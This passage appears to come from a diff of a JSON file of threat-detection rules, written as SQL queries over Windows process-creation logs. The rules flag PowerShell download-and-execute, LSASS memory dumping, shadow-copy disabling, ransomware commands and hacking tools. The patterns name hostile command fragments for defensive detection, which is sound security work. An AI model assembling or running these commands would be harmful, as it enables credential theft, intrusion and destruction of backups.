'%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE 